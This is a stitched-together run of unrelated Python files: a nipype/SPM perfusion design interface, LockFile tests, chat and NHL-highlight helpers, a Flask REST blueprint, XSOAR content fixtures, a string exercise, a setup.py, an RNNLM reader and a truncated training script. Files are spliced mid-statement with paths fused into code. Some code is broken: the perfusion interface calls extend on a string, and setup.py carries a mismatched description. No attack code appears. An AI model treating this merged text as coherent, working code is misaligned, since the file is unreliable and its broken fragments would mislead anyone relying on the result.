get_local_tool_shed_url(config_parser) else: return 1 parser = optparse.OptionParser() parser.add_option('-c', '--config_file', dest='config', action='store', default='config/tool_shed.yml.sample') parser.add_option('-e', '--execute', dest='method', action='store', default='check_db') (args, options) = parser.parse_args() if __name__ == '__main__': sys.exit(main(args)) 1-10 import os import numpy as np from nipype.interfaces import spm from nipype.interfaces.base import (BaseInterface, BaseInterfaceInputSpec, traits, File, TraitedSpec, Directory, isdefined) from nipype.interfaces.spm.base import scans_for_fnames from nipype.utils.filemanip import filename_to_list, list_to_filename import nibabel from procasl.externals.nistats import hemodynamic_models def _get_perfusion_baseline_regressor(n_frames): regressor = np.ones((n_frames, )) regressor[1::2] *= 0.5 regressor[::2] *= -0.5 return [regressor.tolist()], ['perfusion_baseline'] def _get_perfusion_activation_regressor(condition, condition_name, hrf_model, frame_times, oversampling=16, fir_delays=None, min_onset=-24): """ Parameters 
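# Illustrative note (not part of the original module): the baseline perfusion regressor built
# by _get_perfusion_baseline_regressor above simply alternates -0.5 / +0.5 across frames,
# encoding the control/tag alternation of the ASL acquisition described in the class docstring.
# For example:
#   _get_perfusion_baseline_regressor(4) -> ([[-0.5, 0.5, -0.5, 0.5]], ['perfusion_baseline'])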
---------- condition : 3-tuple of arrays (onsets, durations, amplitudes) condition_name : str name of the condition hrf_model : {'spm', 'spm + derivative', 'spm + derivative + dispersion', 'glover', 'glover + derivative', 'fir'} Name of the hrf model to be used frame_times : array of shape (n_scans) the desired sampling times oversampling : int, optional oversampling factor to perform the convolution fir_delays : 1D-array-like, optional delays (in seconds) used in case of a finite impulse reponse model min_onset : float, optional minimal onset relative to frame_times[0] (in seconds) events that start before frame_times[0] + min_onset are not considered Returns ------- computed_regressors: array of shape(n_scans, n_reg) computed regressors sampled at frame times reg_names: list of strings corresponding regressor names Notes ----- The different hemodynamic models can be understood as follows: 'spm': this is the hrf model used in SPM 'spm + derivative': SPM model plus its time derivative (2 regressors) 'spm + time + dispersion': idem, plus dispersion derivative (3 regressors) 'glover': this one corresponds to the Glover hrf 'glover + derivative': the Glover hrf + time derivative (2 regressors) 'glover + derivative + dispersion': idem + dispersion derivative (3 regressors) 'fir': finite impulse response basis, a set of delayed dirac models with arbitrary length. This one currently assumes regularly spaced frame times (i.e. fixed time of repetition). It is expected that spm standard and Glover model would not yield large differences in most cases. In case of glover and spm models, the derived regressors are orthogonalized wrt the main one. """ computed_regressors, reg_names = hemodynamic_models.compute_regressor( condition, hrf_model, frame_times, con_id=condition_name, oversampling=oversampling, fir_delays=fir_delays, min_onset=min_onset) computed_regressors[:, 1::2] *= .5 computed_regressors[:, ::2] *= -.5 reg_names = ['perfusion_' + reg_name for reg_name in reg_names] return computed_regressors.T.tolist(), reg_names def compute_perfusion_regressors(conditions, condition_names, hrf_model, frame_times, oversampling=16, fir_delays=None, min_onset=-24): n_frames = frame_times.size perfusions_regressors, perfusion_regressors_names = \ _get_perfusion_baseline_regressor(n_frames) for condition, condition_name in zip(conditions, condition_names): activation_regressors, activation_regressor_names = \ _get_perfusion_activation_regressor( condition, condition_name, hrf_model, frame_times, oversampling=oversampling, fir_delays=fir_delays, min_onset=min_onset) perfusions_regressors.extend(activation_regressors) perfusion_regressors_names.extend(activation_regressor_names) return perfusions_regressors, perfusion_regressors_names class Level1PerfusionDesignInputSpec(BaseInterfaceInputSpec): spm_mat_dir = Directory( exists=True, field='dir', desc='directory to store SPM.mat file (opt)') timing_units = traits.Enum( 'secs', 'scans', field='timing.units', desc='units for specification of onsets', mandatory=True) interscan_interval = traits.Float( field='timing.RT', desc='Interscan interval in secs', mandatory=True) microtime_resolution = traits.Int( field='timing.fmri_t', desc='Number of time-bins per scan in secs (opt)') microtime_onset = traits.Float( field='timing.fmri_t0', desc='The onset/time-bin in seconds for alignment (opt)') session_info = traits.Any( field='sess', desc='Session specific information generated by ' '``modelgen.SpecifyModel``', mandatory=True) factor_info = traits.List( 
traits.Dict(traits.Enum('name', 'levels')), field='fact', desc='Factor specific information file (opt)') bases = traits.Dict( traits.Enum('hrf', 'fourier', 'fourier_han', 'gamma', 'fir'), field='bases', desc=""" dict {'name':{'basesparam1':val,...}} name : string Name of basis function (hrf, fourier, fourier_han, gamma, fir) hrf : derivs : 2-element list Model HRF Derivatives. No derivatives: [0,0], Time derivatives : [1,0], Time and Dispersion derivatives: [1,1] fourier, fourier_han, gamma, fir: length : int Post-stimulus window length (in seconds) order : int Number of basis functions """, mandatory=True) perfusion_bases = traits.Enum('bases', 'physio', 'none', field='perfusion bases', desc=""" Name of the prf model to be used bases : same as the basis function in bases physio: linear transformation of the basis function. """, mandatory=True) volterra_expansion_order = traits.Enum( 1, 2, field='volt', desc='Model interactions - yes:1, no:2') global_intensity_normalization = traits.Enum( 'none', 'scaling', field='global', desc='Global intensity normalization - scaling or none') mask_image = File( exists=True, field='mask', desc='Image for explicitly masking the analysis') mask_threshold = traits.Either( traits.Enum('-Inf'), traits.Float(), desc="Thresholding for the mask", default='-Inf', usedefault=True) model_serial_correlations = traits.Enum( 'AR(1)', 'FAST', 'none', field='cvi', desc=('Model serial correlations AR(1), FAST or none. FAST ' 'is available in SPM12')) class Level1PerfusionDesignOutputSpec(TraitedSpec): spm_mat_file = File(exists=True, desc='SPM mat file') class Level1PerfusionDesign(BaseInterface): """Generate an SPM design matrix possibly with perfusion regressors. Perfusion regressors consist of - a baseline blood flow reflecting the presence or absence of the inversion tag - BOLD regressors modulated with the baseline blood flow regressor as described in 'Estimation efficiency and statistical power in arterial spin labeling fMRI'. . et al., 2006. Neuroimage 33,p. 103-114. 
http://www.fil.ion.ucl.ac.uk/spm/doc/manual.pdf#page=59 Examples -------- >>> level1design = Level1PerfusionDesign() >>> level1design.inputs.timing_units = 'secs' >>> level1design.inputs.interscan_interval = 2.5 >>> level1design.inputs.bases = {'hrf':{'derivs': [0,0]}} >>> level1design.inputs.session_info = 'session_info.npz' >>> level1design.run() # doctest: +SKIP """ input_spec = Level1PerfusionDesignInputSpec output_spec = Level1PerfusionDesignOutputSpec _jobtype = 'stats' _jobname = 'fmri_spec' def _format_arg(self, opt, spec, val): """Convert input to appropriate format for spm """ if opt in ['spm_mat_dir', 'mask_image']: return np.array([str(val)], dtype=object) if opt in ['session_info']: #, 'factor_info']: if isinstance(val, dict): return [val] else: return val return super(Level1PerfusionDesign, self)._format_arg(opt, spec, val) def _parse_inputs(self): """validate spm realign options if set to None ignore """ einputs = super(Level1PerfusionDesign, self)._parse_inputs( skip=('mask_threshold')) for sessinfo in einputs[0]['sess']: sessinfo['scans'] = scans_for_fnames(filename_to_list( sessinfo['scans']), keep4d=False) if not isdefined(self.inputs.spm_mat_dir): einputs[0]['dir'] = np.array([str(os.getcwd())], dtype=object) return einputs def _run_interface(self, runtime): # Set the design parameters level1design = spm.Level1Design() level1design.inputs.spm_mat_dir = self.inputs.spm_mat_dir level1design.inputs.timing_units = self.inputs.timing_units level1design.inputs.interscan_interval = self.inputs.interscan_interval level1design.inputs.microtime_resolution =\ self.inputs.microtime_resolution level1design.inputs.microtime_onset = self.inputs.microtime_onset level1design.inputs.session_info = self.inputs.session_info level1design.inputs.factor_info = self.inputs.factor_info level1design.inputs.bases = self.inputs.bases level1design.inputs.volterra_expansion_order = \ self.inputs.volterra_expansion_order level1design.inputs.global_intensity_normalization = \ self.inputs.global_intensity_normalization level1design.inputs.mask_image = self.inputs.mask_image level1design.inputs.mask_threshold = self.inputs.mask_threshold level1design.inputs.model_serial_correlations = \ self.inputs.model_serial_correlations perfusion_bases = self.inputs.perfusion_bases if isdefined(perfusion_bases) and perfusion_bases != 'none': # Compute perfusion regressors tr = self.inputs.interscan_interval # TODO: robustify (check session_info type is list of length 1) if isinstance(self.inputs.session_info, list): session_info = self.inputs.session_info[0] elif isinstance(self.inputs.session_info, str): session_info = self.inputs.session_info else: raise ValueError('session_info trait of Level1Design has type' ' {0}'.format(self.inputs.session_info)) n_scans = nibabel.load(session_info['scans']).get_data().shape[-1] frametimes = np.arange(0, n_scans * tr, tr) if perfusion_bases == 'bases': hrf_model = 'spm' if self.inputs.bases['hrf']['derivs'] == [1, 0]: hrf_model.extend(' + derivative') elif self.inputs.bases['hrf']['derivs'] == [1, 1]: hrf_model.extend(' + derivative + dispersion') else: raise ValueError('physio PRF not implemented yet') condition_names = [c['name'] for c in session_info['cond']] # robustify onsets = [c['onset'] for c in session_info['cond']] durations = [c['duration'] for c in session_info['cond']] if 'amplitude' in session_info['cond'][0].keys(): amplitudes = [c['amplitude'] for c in session_info['cond']] else: amplitudes = [1 for c in session_info['cond']] conditions = zip(onsets, durations, 
amplitudes) perfusion_regressors, perfusion_regressor_names = \ compute_perfusion_regressors(conditions, condition_names, hrf_model, frametimes) # Add perfusion regressors to model for n, (regressor, regressor_name) in enumerate( zip(perfusion_regressors, perfusion_regressor_names)): session_info['regress'].insert( n, {'val': regressor, 'name': regressor_name}) level1design.inputs.session_info = [session_info] level1design.run() return runtime def _make_matlab_command(self, content): """validates spm options and generates job structure if mfile is True uses matlab .m file else generates a job structure and saves in .mat """ if isdefined(self.inputs.mask_image): # SPM doesn't handle explicit masking properly, especially # when you want to use the entire mask image postscript = "load SPM;\n" postscript += "SPM.xM.VM = spm_vol('%s');\n" % list_to_filename(self.inputs.mask_image) postscript += "SPM.xM.I = 0;\n" postscript += "SPM.xM.T = [];\n" postscript += "SPM.xM.TH = ones(size(SPM.xM.TH))*(%s);\n" % self.inputs.mask_threshold postscript += "SPM.xM.xs = struct('Masking', 'explicit masking only');\n" postscript += "save SPM SPM;\n" else: postscript = None return super(Level1PerfusionDesign, self)._make_matlab_command(content, postscript=postscript) def _list_outputs(self): outputs = self._outputs().get() spm_mat_file = os.path.join(os.getcwd(), 'SPM.mat') outputs['spm_mat_file'] = spm_mat_file return outputs supportal/app/models/__init__.py from .api_key import APIKey from .email import EmailSend from .person import Person from .user import User from .vol_prospect_models import ( MobilizeAmericaEventSignupExcpetion, VolProspectAssignment, VolProspectContactEvent, ) MarcoMontaltoMonella/Sandpilessrc/__init__.py __version__= "0.1" import os import pytest from lockfile import LockFile, LockFileError def test_file_not_found(): with pytest.raises(FileNotFoundError): LockFile('/path/to/inexistent/file') def test_diretory_as_filename(): with pytest.raises(IsADirectoryError): LockFile('/') def test_lock_resource(): lock = LockFile('/tmp/test_lockfile.lock') lock.lock(2) assert lock.is_locked def test_lock_locked_resource(): lock = LockFile('/tmp/test_lockfile.lock') lock.lock(2) with pytest.raises(LockFileError): lock.lock(2) def test_unlock_resource(): lock = LockFile('/tmp/test_lockfile.lock') lock.lock(2) lock.unlock(2) assert not lock.is_locked def test_unlock_with_wrong_resource(): lock = LockFile('/tmp/test_lockfile.lock') lock.lock(2) with pytest.raises(ValueError): lock.unlock(1) def test_lock_already_initialized_resource(): with open('/tmp/test_lockfile.lock', 'w') as f: f.write('{"lock": false, "id": 0}') lock = LockFile('/tmp/test_lockfile.lock', False) lock.lock(2) assert lock.is_locked def test_lock_already_initialized_and_locked_resource(): with open('/tmp/test_lockfile.lock', 'w') as f: f.write('{"lock": true, "id": 0}') lock = LockFile('/tmp/test_lockfile.lock', False) with pytest.raises(LockFileError): lock.lock(2) import re import hangups def isEventNotification(update): if update.event_notification: return True return False def isMessageEvent(update): if isEventNotification(update): event = update.event_notification.event if event.event_type == hangups.hangouts_pb2.EVENT_TYPE_REGULAR_CHAT_MESSAGE: return True return False def newConversationFilter(conversationIdList): return lambda event: hangups.ConversationEvent(event).conversation_id in conversationIdList def newMessageFilter(regex): pattern = re.compile(regex) return lambda event: 
bool(pattern.match(hangups.ChatMessageEvent(event).text)) def newUserFilter(gaiaIdList): return lambda event: hangups.ConversationEvent(event).user_id.gaia_id in gaiaIdList import json import pathlib import unittest from collections import OrderedDict from datetime import datetime from nhlsuomi.reddit import icydata class Test_icydata(unittest.TestCase): def setUp(self): if not hasattr(self, 'submissions'): path = pathlib.Path(__file__).parent / 'icydata.json' self.submissions = json.loads(path.read_text()) def test_hilights(self): self.assertIsNotNone(self.submissions) keywords = ['Laine', 'Korpisalo'] hilights, _ = icydata.parse_hilights_recaps( self.submissions, keywords, 18, _now=lambda: datetime(2019, 11, 23) ) expected = [ ( 'Laine scores goal', 'https://wscdsszoominwestus.azureedge.net/publish/d663e54d-db5e-4c7d-b3d8-9a0b548aebd4.mp4', ), ( 'Korpisalo makes save', 'https://wscdsszoominwestus.azureedge.net/publish/6efb1f8b-0e2d-498a-aaae-839980d3139c.mp4', ), ( 'Ristolainen scores PPG', 'https://wscdsszoominwestus.azureedge.net/publish/4a64f0f7-c9cf-4e2c-acef-57439a4bcd71.mp4', ) ] self.assertEqual(hilights, expected) def test_no_hilights(self): self.assertIsNotNone(self.submissions) keywords = ['Laine', 'Korpisalo'] hilights, _ = icydata.parse_hilights_recaps( self.submissions, keywords, 18, _now=lambda: datetime(2019, 11, 24) ) expected = [] self.assertEqual(hilights, expected) def test_recaps(self): self.assertIsNotNone(self.submissions) _, recaps = icydata.parse_hilights_recaps( self.submissions[:2], [], 18 ) expected = OrderedDict() expected['PITNJD'] = 'https://hlslive-wsczoominwestus.med.nhl.com/publish/056ae7ef-ac8a-4597-9e2a-caeedfbec847.mp4' expected['OTTNYR'] = 'https://hlslive-wsczoominwestus.med.nhl.com/publish/b00a68fd-caac-40e7-a232-50b72fefb70a.mp4' self.assertEqual(recaps, expected) project_name/ext/restapi/__init__.py from flask import Blueprint from flask_restful import Api from .resources import ProductItemResource, ProductResource bp = Blueprint("restapi", __name__, url_prefix="/api/v1") api = Api(bp) def init_app(app): api.add_resource(ProductResource, "/product/") api.add_resource(ProductItemResource, "/product/") app.register_blueprint(bp) 0 OLD_CLASSIFIER = { "brandName": "test", "custom": True, "defaultIncidentType": "", "id": "test classifier", "keyTypeMap": { "test": "test1" }, "mapping": { "Logz.io Alert": { "dontMapEventToLabels": False, "internalMapping": { "test Alert ID": { "complex": None, "simple": "alertId" }, "details": { "complex": None, "simple": "description" } } } }, "transformer": { "complex": None, "simple": "test" }, "unclassifiedCases": {}, "version": -1, "fromVersion": "5.0.0", "toVersion": "5.9.9" } NEW_CLASSIFIER = { "defaultIncidentType": "test", "id": "testing", "type": "classification", "name": "test Classifier", "description": "Classifies test.", "keyTypeMap": { "test": "test1" }, "transformer": { "complex": None, "simple": "test" }, "version": -1, "fromVersion": "6.0.0", "toVersion": "6.0.5" } MAPPER = { "defaultIncidentType": "test", "id": "test Mapper", "type": "mapping-incoming", "name": "test Mapper", "description": "Mapper test", "mapping": { "test": { "dontMapEventToLabels": False, "internalMapping": { "test Alert ID": { "complex": None, "simple": "alertId" } } } }, "version": -1, "fromVersion": "6.0.0", "toVersion": "6.0.5" } DASHBOARD = { "id": "my-dashboard", "version": -1, "fromVersion": "5.0.0", "description": "", "period": { "byTo": "", "byFrom": "days", "toValue": None, "fromValue": 7, "field": "" }, "fromDateLicense": 
"0001-01-01T00:00:00Z", "name": "my-dashboard", "layout": [ { "id": "a0e381e0-1c86-11e8-8581-45a91cd24d8e", "forceRange": True, "x": 8, "y": 0, "i": "a0e381e0-1c86-11e8-8581-45a91cd24d8e", "w": 4, "h": 4, "widget": { "id": "my-tasks", "version": 1, "modified": "2018-02-28T14:55:09.423998+02:00", "name": "My Tasks", "dataType": "tasks", "widgetType": "list", "query": "assignee:\"{me}\" and (state:Waiting or state:inprogress or state:error)", "sort": [ { "field": "dueDate", "asc": True } ], "isPredefined": True, "dateRange": { "fromDate": "0001-01-01T00:00:00Z", "toDate": "0001-01-01T00:00:00Z", "period": { "byTo": "", "byFrom": "days", "toValue": None, "fromValue": None, "field": "" }, "fromDateLicense": "0001-01-01T00:00:00Z" }, "params": None, "size": 10, "category": "" } }, ], "isPredefined": True } CONNECTION = { "canvasContextConnections": [ { "contextKey1": "MD5", "contextKey2": "SHA256", "connectionDescription": "Belongs to the same file", "parentContextKey": "File" }, { "contextKey1": "MD5", "contextKey2": "SHA1", "connectionDescription": "Belongs to the same file", "parentContextKey": "File" }, ] } INDICATOR_FIELD = { "id": "indicator_field", "version": -1, "modified": "2020-04-30T12:08:12.502031832Z", "fromVersion": "5.5.0", "name": "indicator_field", "ownerOnly": False, "placeholder": "", "description": "", "cliName": "indicator", "type": "singleSelect", "closeForm": False, "editForm": True, "required": False, "script": "", "fieldCalcScript": "", "neverSetAsRequired": False, "isReadOnly": False, "selectValues": [ "1", "2", ], "validationRegex": "", "useAsKpi": True, "locked": False, "system": False, "content": True, "group": 2, "hidden": False, "associatedTypes": [ "Employee" ], "systemAssociatedTypes": None, "associatedToAll": False, "unmapped": False, "unsearchable": True, "caseInsensitive": True, "columns": None, "defaultRows": None, "sla": 0, "threshold": 72, "breachScript": "" } INCIDENT_TYPE = { "id": "incident_type", "version": -1, "locked": False, "name": "incident_type", "prevName": "incident_type", "color": "#32d296", "playbookId": "my-playbook", "hours": 0, "days": 0, "weeks": 0, "hoursR": 0, "daysR": 0, "weeksR": 0, "system": False, "readonly": False, "default": False, "autorun": False, "preProcessingScript": "", "closureScript": "", "disabled": False, "reputationCalc": 0, "fromVersion": "5.5.0" } LAYOUT = { "TypeName": "my-layout", "kind": "details", "fromVersion": "5.0.0", "toVersion": "5.9.9", "layout": { "TypeName": "", "id": "my-layout", "kind": "details", "modified": "2019-09-22T11:09:50.039511463Z", "name": "", "system": False, "tabs": [ { "id": "caseinfoid", "name": "Incident Info", "sections": [ { "displayType": "ROW", "h": 2, "i": "caseinfoid", "isVisible": True, "items": [ { "endCol": 2, "fieldId": "type", "height": 24, "id": "incident-type-field", "index": 0, "startCol": 0 }, ], "moved": False, "name": "Details", "static": False, "w": 1, "x": 0, "y": 0 }, ], "type": "custom", "hidden": False }, ], "typeId": "some-id", "version": -1 }, "typeId": "some-id", "version": -1 } LAYOUTS_CONTAINER = { "id": "my_layoutscontainer", "name": "my_layoutscontainer", "group": "incident", "description": "description", "fromVersion": "6.0.0", "detailsV2": { "tabs": [ { "id": "caseinfoid", "name": "Incident Info", "sections": [ { "displayType": "ROW", "h": 2, "i": "caseinfoid", "isVisible": True, "items": [ { "endCol": 2, "fieldId": "type", "height": 24, "id": "incident-type-field", "index": 0, "startCol": 0 }, ], "moved": False, "name": "Details", "static": False, "w": 1, 
"x": 0, "y": 0 }, ], "type": "custom", "hidden": False }, ] }, "version": -1 } REPORT = { "id": "report", "name": "report", "description": "", "fromVersion": "5.0.0", "tags": [], "createdBy": "DBot", "type": "pdf", "modified": "2018-01-24T15:27:36.431127302Z", "startDate": "0001-01-01T00:00:00Z", "times": 0, "recurrent": False, "endingDate": "0001-01-01T00:00:00Z", "timezoneOffset": 0, "cronView": False, "scheduled": False, "system": True, "locked": False, "sections": [ { "layout": { "tableColumns": [ "name", "occurred", "type", "owner", "severity", "status", "dueDate" ], "readableHeaders": { "name": "Name", "occurred": "Occurred", "type": "Type", "owner": "Owner", "severity": "Severity", "status": "Status", "dueDate": "Due Date" }, "classes": "striped stackable small very compact", "i": "1", "rowPos": 6, "columnPos": 0, "w": 12, "h": 2 }, "query": { "type": "incident", "filter": { "query": "-status:Closed and (severity:High or severity:Critical)", "period": { "byFrom": "days", "fromValue": None, "by": "day" }, "fromDate": None, "toDate": None } }, "type": "table", "title": "Critical and High Incidents" }, ], "recipients": [], "orientation": "portrait", "paperSize": "A4", "runOnce": None, "latestReportName": "", "latestReportTime": "0001-01-01T00:00:00Z", "latestScheduledReportTime": "0001-01-01T00:00:00Z", "nextScheduledTime": "0001-01-01T00:00:00Z", "latestReportUsername": "", "decoder": { "evidences.fetched": { "type": "date", "value": "02/01/06 3:04:05 PM" }, }, "reportType": "", "sensitive": False, "runningUser": "", "dashboard": { "id": "", "version": 0, "modified": "0001-01-01T00:00:00Z", "fromDate": "0001-01-01T00:00:00Z", "toDate": "0001-01-01T00:00:00Z", "period": { "byTo": "", "byFrom": "days", "toValue": None, "fromValue": None, "field": "" }, "fromDateLicense": "0001-01-01T00:00:00Z", "name": "Critical and High incidents", "layout": [ { "id": "2", "forceRange": False, "x": 0, "y": 0, "i": "2", "w": 12, "h": 1, "widget": { "id": "58", "version": 1, "modified": "2018-01-23T16:42:36.157893339Z", "name": "criticalAndHighIncidents Headline", "dataType": "incidents", "widgetType": "text", "query": "-status:Closed and (severity:High or severity:Critical)", "isPredefined": False, "dateRange": { "fromDate": "0001-01-01T00:00:00Z", "toDate": "0001-01-01T00:00:00Z", "period": { "byTo": "", "byFrom": "days", "toValue": None, "fromValue": None, "field": "" }, "fromDateLicense": "0001-01-01T00:00:00Z" }, "params": { "text": "# **Critical and High incidents**\n\n{date}\n\n---" }, "size": 0 } }, ], "isPredefined": False } } REPUTATION = { "id": "reputation", "version": -1, "fromVersion": "5.5.0", "modified": "2019-07-18T08:57:51.058271942Z", "sortValues": None, "commitMessage": "", "shouldPublish": False, "shouldCommit": False, "regex": "", "details": "reputation", "prevDetails": "reputation", "reputationScriptName": "", "reputationCommand": "", "enhancementScriptNames": [], "system": False, "locked": False, "disabled": False, "file": False, "updateAfter": 0, "mergeContext": False, "formatScript": "", "contextPath": "", "contextValue": "", "excludedBrands": [], "expiration": 0, "defaultMapping": {}, "manualMapping": None, "fileHashesPriority": None, "legacyNames": ["Malware"] } WIDGET = { "id": "widget", "version": -1, "fromVersion": "5.0.0", "name": "widget", "dataType": "incidents", "widgetType": "bar", "query": "-category:job and -status:archived and -status:closed", "isPredefined": True, "dateRange": { "fromDate": "0001-01-01T00:00:00Z", "toDate": "0001-01-01T00:00:00Z", "period": { 
"byTo": "", "byFrom": "days", "toValue": None, "fromValue": 7, "field": "" }, "fromDateLicense": "0001-01-01T00:00:00Z" }, "params": { "groupBy": [ "owner" ] }, "description": "" } INCIDENT_FIELD = { "associatedToAll": False, "associatedTypes": [ "Me" ], "breachScript": "", "caseInsensitive": True, "cliName": "incidentfield", "closeForm": False, "columns": None, "content": True, "defaultRows": None, "description": "", "editForm": True, "fieldCalcScript": "", "group": 0, "hidden": False, "id": "incident-field", "isReadOnly": False, "locked": False, "name": "incident-field", "neverSetAsRequired": False, "ownerOnly": False, "placeholder": "", "required": False, "script": "", "selectValues": None, "sla": 0, "system": False, "systemAssociatedTypes": None, "threshold": 72, "type": "shortText", "unmapped": False, "unsearchable": True, "useAsKpi": False, "validationRegex": "", "version": -1, "fromVersion": "5.0.0" } GENERIC_FIELD = { "associatedToAll": False, "associatedTypes": [ "Workstation" ], "caseInsensitive": True, "cliName": "operatingsystem", "id": "generic_asset_operatingsystem", "name": "Operating System", "closeForm": False, "content": True, "editForm": True, "group": 4, "definitionId": "asset", "genericModuleId": "rbvm", "hidden": False, "isReadOnly": False, "locked": False, "neverSetAsRequired": False, "ownerOnly": False, "required": False, "sla": 0, "system": False, "threshold": 72, "type": "shortText", "unmapped": False, "unsearchable": True, "useAsKpi": False, "version": -1, "fromVersion": "6.5.0", "openEnded": False } GENERIC_TYPE = { "id": "Workstation", "layout": "Workstation Layout", "locked": False, "name": "Workstation", "color": "#8052f4", "definitionId": "asset", "genericModuleId": "rbvm", "system": False, "version": -1, "fromVersion": "6.5.0" } GENERIC_MODULE = { "id": "rbvm", "version": -1, "name": "Risk Based Vulnerability Management", "fromVersion": "6.5.0", "definitionIds": [ "asset" ], "views": [{ "icon": "icon-widget-infinity-24-s", "name": "RBVM", "title": "Risk Base Vulnerability Management", "id": "RBVM", "tabs": [ { "name": "Assets", "newButtonDefinitionId": "asset", "dashboard": { "id": "asset_dashboard" } }] }] } UNIFIED_GENERIC_MODULE = { "id": "rbvm", "version": -1, "name": "Risk Based Vulnerability Management", "fromVersion": "6.5.0", "definitionIds": [ "asset" ], "views": [{ "icon": "icon-widget-infinity-24-s", "name": "RBVM", "title": "Risk Base Vulnerability Management", "id": "RBVM", "tabs": [ { "name": "Assets", "newButtonDefinitionId": "asset", "dashboard": { "id": "asset_dashboard", "version": -1, "fromVersion": "5.0.0", "description": "", "period": { "byTo": "", "byFrom": "days", "toValue": None, "fromValue": 7, "field": "" }, "fromDateLicense": "0001-01-01T00:00:00Z", "name": "my-dashboard", "layout": [{ "id": "a0e381e0-1c86-11e8-8581-45a91cd24d8e", "forceRange": True, "x": 8, "y": 0, "i": "a0e381e0-1c86-11e8-8581-45a91cd24d8e", "w": 4, "h": 4, "widget": { "id": "my-tasks", "version": 1, "modified": "2018-02-28T14:55:09.423998+02:00", "name": "My Tasks", "dataType": "tasks", "widgetType": "list", "query": "assignee:\"{me}\" and (state:Waiting or state:inprogress or state:error)", "sort": [ { "field": "dueDate", "asc": True } ], "isPredefined": True, "dateRange": { "fromDate": "0001-01-01T00:00:00Z", "toDate": "0001-01-01T00:00:00Z", "period": { "byTo": "", "byFrom": "days", "toValue": None, "fromValue": None, "field": "" }, "fromDateLicense": "0001-01-01T00:00:00Z" }, "params": None, "size": 10, "category": "" } }, ], "isPredefined": True } }] }] } 
GENERIC_DEFINITION = { "version": -1, "locked": False, "system": False, "fromVersion": "6.5.0", "id": "assets", "name": "Assets", "partitioned": True, "auditable": False, "rbacSupport": True } EMPTY_ID_SET = { 'scripts': [], 'integrations': [], 'playbooks': [], 'TestPlaybooks': [], 'Classifiers': [], 'Dashboards': [], 'IncidentFields': [], 'IncidentTypes': [], 'IndicatorFields': [], 'IndicatorTypes': [], 'Layouts': [], 'Reports': [], 'Widgets': [], 'Mappers': [], 'GenericTypes': [], 'GenericFields': [], 'GenericModules': [], 'GenericDefinitions': [], 'Packs': [] } cadena = input("\33[0mIngrese una cadena: \33[34m") print("\33[0mPrimeros caracteres:\33[33m", cadena[0:2]) print("\33[0mÚltimos caracteres:\33[33m", cadena[-3:]) print("\33[0mCada 2 caracteres: \33[33m", end='') for i in range(len(cadena)): if i % 2 == 0: print(cadena[i], end='') print("\33[0m") reversa = ''.join(reversed(cadena)) espejo = cadena + reversa print("\33[0mCadena inversa:\33[33m", reversa) print("\33[0mCadena espejo:\33[33m", espejo) print("\33[0m") setup.py import os from setuptools import setup, find_packages path = os.path.abspath(os.path.dirname(__file__)) try: with open(os.path.join(path, 'README.md')) as f: long_description = f.read() except Exception as e: long_description = "customize okta cli" setup( name = "pal-tsne", version = "0.1.0", keywords = ("pip", "tsne", "parallel", "xenos"), description = "parallel tsne", long_description = long_description, long_description_content_type='text/markdown', python_requires=">=3.6.0", license = "MIT Licence", url = "https://github.com/MingChaoXu/paralell-tsne", author = "xenos", author_email = "", packages = find_packages(), include_package_data = True, install_requires = ["requests", "click"], platforms = "any", scripts = [], entry_points = { 'console_scripts': [ 'pal-tsne=tsne.cli:main_cli' ] } )# Copyright 2015 The TensorFlow Authors. All Rights Reserved. # Copyright (C) 2017 Intellisist, Inc. (Author: ) # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Utilities for parsing RNNLM text files.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import collections import os import tensorflow as tf def _read_words(filename): with tf.gfile.GFile(filename, "r") as f: return f.read().decode("utf-8").split() def _build_vocab(filename): words = _read_words(filename) word_to_id = dict(list(zip(words, list(range(len(words)))))) return word_to_id def _file_to_word_ids(filename, word_to_id): data = _read_words(filename) return [word_to_id[word] for word in data if word in word_to_id] def rnnlm_raw_data(data_path, vocab_path): """Load RNNLM raw data from data directory "data_path". Args: data_path: string path to the directory where train/valid files are stored Returns: tuple (train_data, valid_data, test_data, vocabulary) where each of the data objects can be passed to RNNLMIterator. 
""" train_path = os.path.join(data_path, "train") valid_path = os.path.join(data_path, "valid") word_to_id = _build_vocab(vocab_path) train_data = _file_to_word_ids(train_path, word_to_id) valid_data = _file_to_word_ids(valid_path, word_to_id) vocabulary = len(word_to_id) return train_data, valid_data, vocabulary, word_to_id def rnnlm_gen_data(*files): """Generates data and vocab from files. This function is used solely for testing. """ import collections import re all_words = collections.Counter() all_word_lists = [] for f in files: with open(f, mode="r") as fp: text = fp.read() word_list = re.split("[^A-Za-z]", text) word_list = list(filter(None, word_list)) all_words.update(word_list) all_word_lists.append(word_list) word_to_id = {word: i for i, (word, _) in enumerate(all_words.most_common())} def convert(word_list): return [word_to_id[word] for word in word_list] all_word_ids = [convert(word_list) for word_list in all_word_lists] return all_word_ids, word_to_id class RNNLMProducer(tf.Module): """This is the data feeder.""" def __init__(self, raw_data, batch_size, num_steps, name=None): super().__init__(name) self.batch_size = batch_size self.num_steps = num_steps self.epoch_size = (len(raw_data) - 1) // num_steps // batch_size # load data into a variable so that it will be separated from graph self._raw_data = tf.Variable(raw_data, dtype=tf.int32, trainable=False) ds_x = tf.data.Dataset.from_tensor_slices(self._raw_data) ds_y = ds_x.skip(1) ds = tf.data.Dataset.zip((ds_x, ds_y)) # form samples ds = ds.batch(num_steps, drop_remainder=True) # form batches self._ds = ds.batch(batch_size, drop_remainder=True) def iterate(self): return self._ds if __name__ == "__main__": samples = list(range(100)) ds = RNNLMProducer(samples, 4, 8) print(ds.epoch_size) for data in ds.iterate(): print(data) # Copyright (C) 2019-2021, . # This program is licensed under the Apache License version 2. # See LICENSE or go to for full license details. 
''' Training script for image classification '''

import os
import time
import math
import datetime

import numpy as np
import torch
import torch.nn as nn
from torch.utils.data import RandomSampler, SequentialSampler
from torchvision.datasets import ImageFolder, CIFAR10, CIFAR100
from torchvision.transforms import transforms as T

import holocron
from holocron.trainer import ClassificationTrainer


def worker_init_fn(worker_id: int) -> None:
    np.random.seed((worker_id + torch.initial_seed()) % np.iinfo(np.int32).max)


def main(args):

    print(args)

    torch.backends.cudnn.benchmark = True

    # Data loading
